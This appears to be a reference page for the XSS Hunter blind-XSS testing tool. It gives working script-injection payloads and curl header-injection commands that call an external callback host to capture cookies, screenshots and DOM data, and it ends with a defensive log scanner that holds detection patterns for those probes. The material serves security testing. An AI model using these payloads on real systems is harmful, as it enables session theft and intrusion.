Description
XSS Hunter detects blind XSS vulnerabilities by providing a hosted payload that calls back when executed. When your injected payload fires in an admin panel, email client, or internal tool, XSS Hunter captures screenshots, cookies, DOM content, and the execution context. This makes it a core tool for blind XSS testing, where the payload executes in a context the tester cannot observe directly.
Installation
BASH
# Self-hosted (Express edition)
git clone https://github.com/mandatoryprogrammer/xsshunter-express.git
cd xsshunter-express
npm install
# Configure .env with your domain and settings
npm start
# Or use the hosted version (if available)
# Register at xsshunter.com for a callback domain
Basic Usage
JAVASCRIPT
// Inject this payload into any input that might render elsewhere
"><script src=https://YOUR_SUBDOMAIN.xss.ht></script>
// Attribute-based injection
" onfocus=eval(atob('BASE64_PAYLOAD')) autofocus="
// Image tag injection
<img src=x onerror=eval(atob('BASE64_PAYLOAD'))>
Advanced Usage
JAVASCRIPT
// Polyglot payload (works in multiple contexts)
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
// Payload for Content Security Policy bypass
<script src="https://YOUR_SUBDOMAIN.xss.ht"></script>
// For tight character limits, use short payloads
<svg/onload=import('//YOUR.xss.ht')>
What XSS Hunter Captures
- Screenshot of the page where XSS executed
- Cookies (including HttpOnly when possible)
- DOM snapshot of the page
- URL where the payload triggered
- User-Agent and IP of the victim
- Origin of the injection point
Common Workflows
BASH
# Inject blind XSS payloads in:
# 1. Contact forms (admin reads submissions)
# 2. User-Agent headers (logged in admin panels)
# 3. Referrer headers (analytics dashboards)
# 4. Support ticket systems
# 5. Email fields (rendered in admin views)
# 6. Feedback forms and surveys
# Example: User-Agent blind XSS
curl -A '"><script src=https://YOUR.xss.ht></script>' https://target.com/
# Example: Referer header (the HTTP header name is spelled "Referer")
curl -H 'Referer: "><script src=https://YOUR.xss.ht></script>' https://target.com/
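As an added example (not XSS Hunter's own code), here is a Node.js scan of combined-format access logs for the header-based probes shown in the two curl commands above; the log lines are constructed and the `abc.xss.ht` subdomain is a placeholder. A hit on an admin panel's logs means the page that renders those headers needs its output encoding reviewed.

```javascript
// Added example: flag blind-XSS probes carried in User-Agent / Referer.
// Apache/nginx "combined" log format; quoted fields may contain \" escapes,
// which is exactly what a payload such as "><script ...> produces.
const COMBINED_RE =
  /^(\S+) \S+ \S+ \[([^\]]+)\] "((?:[^"\\]|\\.)*)" (\d{3}) (\S+) "((?:[^"\\]|\\.)*)" "((?:[^"\\]|\\.)*)"$/;

function parseCombinedLogLine(line) {
  const m = COMBINED_RE.exec(line);
  if (!m) return null;
  const unescape = (s) => s.replace(/\\(.)/g, '$1'); // \" -> "
  return {
    ip: m[1], time: m[2], request: unescape(m[3]), status: m[4],
    referer: unescape(m[6]), user_agent: unescape(m[7]),
  };
}

// Coarse indicators matching the payload shapes shown on this page.
// They surface probes for review; tune them against your own traffic.
const INDICATORS = {
  tag: /<\s*(?:script|svg|img|iframe)\b/i,
  event_handler: /\bon(?:load|error|focus|click|mouseover)\s*=/i,
  dynamic_import: /\bimport\s*\(/i,
  eval_atob: /\beval\s*\(\s*atob\s*\(/i,
  callback_domain: /\bxss\.ht\b/i, // hosted XSS Hunter callback domain
};

// One finding per (line, header) that matches at least one indicator.
function scanAccessLog(lines) {
  const findings = [];
  lines.forEach((line, idx) => {
    const entry = parseCombinedLogLine(line);
    if (!entry) return; // unparseable line: skip rather than crash
    for (const field of ['user_agent', 'referer']) {
      const hits = Object.keys(INDICATORS).filter((k) => INDICATORS[k].test(entry[field]));
      if (hits.length) findings.push({ line: idx + 1, ip: entry.ip, field, indicators: hits });
    }
  });
  return findings;
}

// Constructed sample: one benign request, a User-Agent probe, a Referer probe,
// and a short svg/import probe inside an otherwise normal User-Agent.
const SAMPLE_LOG = [
  '203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
  '203.0.113.7 - - [10/Oct/2023:13:55:40 +0000] "GET / HTTP/1.1" 200 512 "-" "\\"><script src=https://abc.xss.ht></script>"',
  '203.0.113.9 - - [10/Oct/2023:13:55:44 +0000] "GET / HTTP/1.1" 200 512 "\\"><script src=https://abc.xss.ht></script>" "curl/8.1.2"',
  '198.51.100.2 - - [10/Oct/2023:13:56:01 +0000] "GET /login HTTP/1.1" 200 2048 "https://example.com/" "Mozilla/5.0 <svg/onload=import(\'//abc.xss.ht\')>"',
];

console.log(JSON.stringify(scanAccessLog(SAMPLE_LOG), null, 2));
```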